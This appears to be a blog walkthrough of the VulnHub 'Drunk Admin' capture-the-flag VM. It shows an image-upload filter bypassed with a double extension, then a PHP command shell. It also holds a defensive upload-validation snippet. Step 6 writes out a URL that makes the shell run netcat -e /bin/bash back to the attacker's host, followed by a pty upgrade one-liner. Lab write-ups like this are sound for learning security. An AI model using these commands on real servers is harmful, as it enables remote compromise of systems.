Sunday, September 10, 2017

Drunk Admin Challenge


Time for another VM CTF challenge. I often have difficulty finding a good boot-to-root VM: either the image is too slow to download, doesn't work, doesn't connect to the network, blah blah. More often than not I find myself troubleshooting the VM rather than pentesting it. I was lucky enough to get this challenge working on my VMware Workstation. It is mainly an application pentest and was a very educational experience. You can download the challenge from VulnHub.

1. First, port scan the target. Only 2 ports were found open; not much, but HTTP ports are usually gold mines, so if you see one, explore it immediately.

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.5p1 Debian 6+squeeze1 (protocol 2.0)
| ssh-hostkey: 
|   1024 57:a2:04:3d:6e:e5:01:7b:b4:c6:e5:f9:76:25:8a:8a (DSA)
|_  2048 66:9a:ee:a2:2a:1a:59:47:b9:c5:50:da:a6:96:76:16 (RSA)
8880/tcp open  http    Apache httpd 2.2.16 ((Debian))
|_http-server-header: Apache/2.2.16 (Debian)


2. Port 8880 reveals an image upload tool:

3. Exploring it a bit shows that it accepts only image files for display and renames each upload to its md5 hash; the files are stored in the images directory, as you can see from the image properties dialog.

4. I tried to upload several canned PHP files but they got rejected. I fired up Burp Suite to explore how the rejection mechanism works and sent the requests to Repeater.

5. It seems we can trick it by giving the file a double extension! But any script (be it php, bash, nc, etc.) gets rejected again; it seems some backend code filters certain keywords from the script. I finally found a PHP snippet that wasn't filtered: instead of the usual $_GET statement, I used $_REQUEST.
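
The defender's side of step 5, as an added example rather than the challenge's own image.php: the weak check below is my assumption of what a filter that falls for a double extension looks like, and the strict version only trusts the final extension plus the file's image signature, deriving the stored name from the content hash and the whitelist key instead of anything the client sent.

```python
import hashlib
import os
from typing import Optional

# Whitelisted image extensions and the magic bytes each must start with.
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}


def weak_accepts(filename: str) -> bool:
    """Assumed shape of a flawed filter: accept if an image extension
    appears anywhere in the name, so 'x.png.php' slips through."""
    lower = filename.lower()
    return any("." + ext in lower for ext in ALLOWED)


def strict_store_name(filename: str, data: bytes) -> Optional[str]:
    """Return the md5-based name to save the file under, or None if it
    must be rejected. Only the final extension counts, and the bytes
    must carry the signature that extension promises."""
    base = os.path.basename(filename).lower()
    stem, dot, ext = base.rpartition(".")
    if not dot or not stem or ext not in ALLOWED:
        return None                      # no, unknown, or '.php' extension
    if not data.startswith(ALLOWED[ext]):
        return None                      # extension lies about the content
    # md5 is only a naming scheme here (as on the challenge box), not a
    # security control; the extension comes from the whitelist key.
    return hashlib.md5(data).hexdigest() + "." + ext


# Constructed samples, not files taken from the challenge VM.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_SAMPLE = b"<?php /* not an image */ ?>"


def demo() -> dict:
    return {
        "weak_double_ext": weak_accepts("shell.png.php"),
        "strict_double_ext": strict_store_name("shell.png.php", PHP_SAMPLE),
        "strict_renamed_php": strict_store_name("shell.png", PHP_SAMPLE),
        "strict_real_png": strict_store_name("photo.png", PNG_SAMPLE),
    }
```

Even with this check, the images directory should not execute server-side code at all (no PHP handler for that path), so a bypass of the validator would still only yield a static file.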

6. From here, I can pass arguments directly to my PHP script. I decided to use netcat to connect back to my host; luckily it supported the -e flag, which most Linux netcats do but the BSD ones don't.

http://192.168.0.152:8880/images/178eaa4e889ab53ce844344ffc945171?cmd=nc%20-e%20/bin/bash%20192.168.0.115%201234

Remember to have a netcat listener on the other end waiting to catch your shell:

# nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.0.115] from (UNKNOWN) [192.168.0.152] 53197
ls
178eaa4e889ab53ce844344ffc945171.php
1c2ef37a0744cfda7445d3b9fc19a79a.php
1e5608a13dcfe96b1d85a5de98db59d2.png
3208fd203ca8fdfa13bc98a4832c1396.gif
3df5758863d650e59525cf2aa0676230.png
4c68c46f43183b9789860c8a8d6cb5a0.php
72e334fc2377e9bdfa97d50bd4d14120.gif
7cb21b9ceb02fe655f8530fb8fa17338.png
8dc053a3ed0adf03994f96347d20d9e5.png
a764b0164c364725dc5b775d88bc6057.png
aa63b1c597b45e4f1f883724d0f8dfbe.jpg
d38dd53a79f0ce66874082df5a6978df.gif
index.html
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www/images
uname -a
Linux drunkadm 2.6.32-5-686 #1 SMP Mon Jan 16 16:04:25 UTC 2012 i686 GNU/Linux

7. I don't like half-baked shells, so fire up a Python pty spawn for a better one; see the pentestmonkey one-liners.

python -c 'import pty;pty.spawn("/bin/bash")'
www-data@drunkadm:/var/www/images$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

8. Look around the system for the flag. Found a hidden proof.txt file.

www-data@drunkadm:/var/www$ cd /var/www/
cd /var/www/
www-data@drunkadm:/var/www$ ls -al
ls -al
total 48
drwxr-xr-x  4 root root     4096 Apr  2  2012 .
drwxr-xr-x 14 root root     4096 Mar  3  2012 ..
-rw-r--r--  1 root root      217 Mar  3  2012 .htaccess
-rw-r--r--  1 root root      322 Mar  6  2012 .proof
-rw-r--r--  1 root root     2683 Mar  7  2012 image.php
drwxrwxr-x  2 root www-data 4096 Sep  9 18:28 images
-rw-r--r--  1 root root     1981 Mar  4  2012 index.php

9. This file is a little conversation between bob and someone else, and there's an encoded string too that looks like base64.

www-data@drunkadm:/var/www$ cat .proof
cat .proof
#########################
# Drunk Admin Challenge #
#     by @anestisb #
#########################

bob> Great work.
bob> Meet me there.
...> ?
bob> What? You don't know where?
bob> Work a little more your post
     exploitation skills.

Secret Code:
TGglMUxecjJDSDclN1Ej

Mail me your methods at:
anestis@bechtsoudis.com

10. Let's decode it:

# echo "TGglMUxecjJDSDclN1Ej" | base64 -d
Lh%1L^r2CH7%7Q#

11. I poked around bob's home directory to find an encrypt.php page! Inserting the decoded message gives the final output:

Alice, prepare for a kinky night. Meet me at '35.517286' '24.017637'

Well, this was a good challenge. Lots of people have solved this puzzle before me. I have to admit I had some help from their walkthroughs, but nevertheless it was an educational experience for me.
